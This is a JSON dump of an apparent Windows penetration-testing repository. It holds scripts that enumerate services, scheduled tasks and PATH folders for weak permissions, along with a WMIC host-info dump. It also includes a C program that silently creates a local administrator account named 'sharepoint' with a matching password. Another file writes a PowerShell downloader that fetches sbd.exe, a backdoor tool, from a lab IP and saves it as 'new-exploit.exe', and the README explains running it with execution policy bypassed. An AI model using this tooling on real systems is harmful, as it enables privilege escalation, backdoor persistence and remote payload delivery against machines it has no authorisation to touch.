[ { "path": "Powershell/folderperms.ps1", "content": "# Author : Parvez Anwar (@parvezghh)\n# Date : 17/11/13\n#\n# powershell.exe -executionpolicy bypass -file folderperm.ps1\n\n\n$numofpaths = 0\n$countcopies = 0\n$filetocopy = \"testfile.txt\"\n\n\n$myarray = (gi env:path).value.split(';')\n\nWrite-Host \"\" \nWrite-Host \"[i] Number of folder paths :\" $myarray.count\n\n# If the last path entry ends in semi-colon\n\nif ($myarray[$myarray.count-1] -eq \"\")\n{\n $numofpaths = $myarray.count - 2\n}\nelse\n{\n $numofpaths = $myarray.count - 1\n}\n\nNew-Item $filetocopy -type file | Out-Null\n\n$FileExists = (Test-Path $filetocopy)\n\nif (!($FileExists)) \n{\n Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy\n exit\n}\n\nWrite-Host \"[i] Copying and removing test file to path folders where access is granted\"\n\nfor($i=0; $i -le $numofpaths; $i++)\n{\n if (Test-Path -Path $myarray[$i])\n {\n Copy-Item $filetocopy $myarray[$i] -errorAction SilentlyContinue -errorVariable errors\n\n if ($errors.count -le 0)\n {\n Write-Host -foregroundColor Green \" Access granted:\" $myarray[$i] \n $countcopies = $countcopies + 1\n $filetoremove = $myarray[$i] + \"\\\" + $filetocopy\n Remove-Item $filetoremove\n }\n else\n {\n Write-Host -foregroundColor Red \" Access denied :\" $myarray[$i] \n }\n }\n else\n {\n Write-Host -foregroundColor Blue \" Folder missing:\" $myarray[$i] \n }\n\n}\n\nRemove-Item $filetocopy \n\n\n" }, { "path": "Powershell/powershell_download_file.txt", "content": "echo $storageDir = $pwd > wget.ps1\necho $webclient = New-Object System.Net.WebClient >>wget.ps1 \necho $url = \"http://10.11.0.36/sbd.exe\" >>wget.ps1 \necho $file = \"new-exploit.exe\" >>wget.ps1\necho $webclient.DownloadFile($url,$file) >>wget.ps1\n" }, { "path": "README.md", "content": "# windows-pentest\nWindows Pentest Scripts and Tools.\n\n\n#### wmic-info - Retrieve system info.\nUses WMIC to gather various important informatoon about a windows host and dump it to HTML.\n\n#### icacls.bat - Weak permissions on Services.\n* Script that queries all services. \n* Removes default tasks and any Microsot related. \n* Then checks the BINARY_PATHS for any exeuctables that have the Everyone or Usergroup set with RW access.\n\n#### schcheck.bat - Weak permissions on scheduled task executables.\n* Lists all schededuled tasks. \n* Runs list of executables against icacls and checks if any allow Everyone RW permissions.\n\n#### adduser.c - Creates user and adds to administrator group.\n* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. \n* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c \n\n\n#### Powershell/powershell_download_file.txt - Create wget powershell script to download external files.\n\n* Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard`\n* Paste into Windows command prompt which will create a **wget.ps1**\n* `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`\n\n#### Privelege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe\n##### Identify the level of access a particular user or groups have to files, directories, Registry keys.\n\nWhen executing any of the sysinternals tools for the first time the user will be presented with a GUI\npop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag\nto automatically accept the EULA.\n\n accesschk.exe /accepteula \n\nThe following command reports the accesses that the Power Users account has to files and directories in \\Windows\\System32:\n\n accesschk \"power users\" c:\\windows\\system32\n\nThis command shows which Windows services members of the Users group have write access to:\n\n accesschk users -cw *\n\nCheck what access authenticated users have to services.\n\n accesschk.exe -uwcqv \"Authenticated Users\" *\n\nCheck which Windows services a user called adam.dale has write access to:\n\n accesschk.exe -uwcqv adam.dale *\n\nCheck to see what access permissions are set on the serice called NetLogon\n\n accesschk.exe -ucqv NetLogon\n\nFind all weak folder permissions per drive.\n\n accesschk.exe -uwdqs Users c:\\\n accesschk.exe -uwdqs \"Authenticated Users\" c:\\\n\nFind all weak file permissions per drive.\n\n accesschk.exe -uwqs Users c:\\*.*\n accesschk.exe -uwqs \"Authenticated Users\" c:\\*.*\n\n\nTo see what Registry keys under HKLM\\CurrentUser a specific account has no access to:\n\n accesschk -kns austin\\mruss hklm\\software\n\nTo see the security on the HKLM\\Software key:\n\n accesschk -k hklm\\software\n\nTo see all files under \\Users\\Mark on Vista that have an explicit integrity level:\n\n accesschk -e -s c:\\users\\mark\n\nTo see all global objects that Everyone can modify:\n\n accesschk -wuo everyone \\basednamedobjects\n\n#### Powershell/folderperms.ps1\n##### Checks for folders in the current PATH variable that are writeable for all authenticated users.\n\nWhen new folders are created in the root it is writeable for all authenticated users by default. The “NT AUTHORITY\\Authenticated Users:(I)(M)” gets added to the folder where M stands for modify access. So any application that gets installed on the root can be tampered with by a non-admin user. \n\nThe script checks for any of those folders that are writeable by authenticated users.\n" }, { "path": "adducer.c", "content": "#include /* system, NULL, EXIT_FAILURE */\n/* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. */\n/* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c */\nint main () {\nint i;\ni=system (\"net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add\"); return 0;\n}\n" }, { "path": "icacls.bat", "content": "@echo off\nREM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access.\nREM Type: Incorrect file permissions\nREM Note: The ^ characters escapes certain characters that brerak the FOR loop.\nREM Note: tokens=1* - The value at the first delimeter and everything after. \nfor /f \"tokens=1*\" %%m in ('sc query state^= all ^| find \"SERVICE_NAME\"') do (\n for /f \"tokens=1* delims=: \" %%r in ('sc qc \"%%~n\" ^| find \"BINARY_PATH_NAME\"') do (\n for /f \"delims=\" %%x in ('echo(%%~s^| findstr /L /V /I /C:\"%SystemRoot%\\System32\" /C:\"%SystemRoot%\\SysWOW64\"') do (\n icacls \"%%~x\"\n )\n )\n)\n" }, { "path": "schcheck.bat", "content": "@echo off\nREM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions.\nREM - Note: At present the script only ECHO's tasks.\nfor /f \"tokens=3* delims=: \" %%m in ('schtasks /query /v /fo LIST ^| find \"Task To Run:\"') do (\n\tfor /f \"tokens=1* delims=?\" %%x in ('echo(%%~n^| findstr /L /V /I /C:\"COM handler\" /C:\"multiple\" /C:\"%SystemRoot%\" /C:\"shutdown\"') do (\n\tECHO %%~x REM > results.txt\n\t)\n )\n" }, { "path": "wmic-info", "content": "for /f \"delims=\" %%A in ('dir /s /b %WINDIR%\\system32\\*htable.xsl') do set \"var=%%A\"\n\nwmic process get CSName,Description,ExecutablePath,ProcessId /format:\"%var%\" >> out.html\nwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:\"%var%\" >> out.html\nwmic USERACCOUNT list full /format:\"%var%\" >> out.html\nwmic group list full /format:\"%var%\" >> out.html\nwmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:\"%var%\" >> out.html\nwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:\"%var%\" >> out.html\nwmic netuse list full /format:\"%var%\" >> out.html\nwmic qfe get Caption,Description,HotFixID,InstalledOn /format:\"%var%\" >> out.html\nwmic startup get Caption,Command,Location,User /format:\"%var%\" >> out.html\nwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:\"%var%\" >> out.html\nwmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:\"%var%\" >> out.html\nwmic Timezone get DaylightName,Description,StandardName /format:\"%var%\" >> out.html\n" } ]